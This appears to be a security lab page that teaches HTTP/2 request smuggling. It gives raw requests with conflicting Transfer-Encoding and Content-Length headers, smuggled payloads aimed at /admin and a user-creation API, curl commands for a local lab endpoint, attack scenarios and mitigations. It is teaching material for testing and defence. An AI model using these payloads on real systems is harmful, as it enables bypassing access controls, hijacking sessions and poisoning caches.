Lab 3: HTTP/2 Request Smuggling - HTTP Request Smuggling

Difficulty: Medium

Lab Overview

This lab demonstrates HTTP/2 Request Smuggling vulnerabilities that occur during the conversion from HTTP/2 to HTTP/1.1. Many reverse proxies and load balancers convert HTTP/2 requests to HTTP/1.1, which can introduce parsing differences.

Objective: Exploit HTTP/2 specific features and conversion issues to smuggle requests past security controls.

HTTP/2 Conversion Issues

// HTTP/2 Request Smuggling Examples

// 1. Transfer-Encoding in HTTP/2
POST /3.php HTTP/2
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// 2. HTTP/2 Pseudo-Headers
POST /3.php HTTP/2
Host: example.com
:method: POST
:path: /3.php
:scheme: https
:authority: example.com
Content-Length: 3

0

SMUGGLED

// 3. Header Name Case Sensitivity
POST /3.php HTTP/2
Host: example.com
content-length: 3
Transfer-Encoding: chunked

0

SMUGGLED

HTTP/2 Smuggling Tester

Test Payloads:

0\r\n\r\nSMUGGLED - Basic HTTP/2 payload
0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n - Admin access
0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin - API access

Vulnerability Details

Type: HTTP Request Smuggling (HTTP/2)
Severity: High
Method: POST
Issue: HTTP/2 to HTTP/1.1 conversion differences

Test Payloads

Try these payloads in the request body:

0\r\n\r\nSMUGGLED
0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n
0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin

Manual Testing with curl

Use these curl commands to test the vulnerability:

# HTTP/2 Request
curl -X POST http://localhost/test/http_rs/3.php \
  --http2 \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 3" \
  -d "0

SMUGGLED"

# HTTP/1.1 Request (for comparison)
curl -X POST http://localhost/test/http_rs/3.php \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 3" \
  -d "0

SMUGGLED"

Real-World Attack Scenarios

Bypass security controls and access unauthorized resources
Access internal APIs and sensitive endpoints
Bypass authentication and authorization mechanisms
Session hijacking and user impersonation
Cache poisoning and serving malicious content
Compliance violations and security breaches

Mitigation Strategies

Ensure consistent parsing between HTTP/2 and HTTP/1.1
Disable Transfer-Encoding support in HTTP/2
Use proper HTTP/2 to HTTP/1.1 conversion
Implement request validation and sanitization
Use reverse proxies that handle HTTP/2 correctly
Regular security testing and vulnerability assessments
Monitor for unusual request patterns and anomalies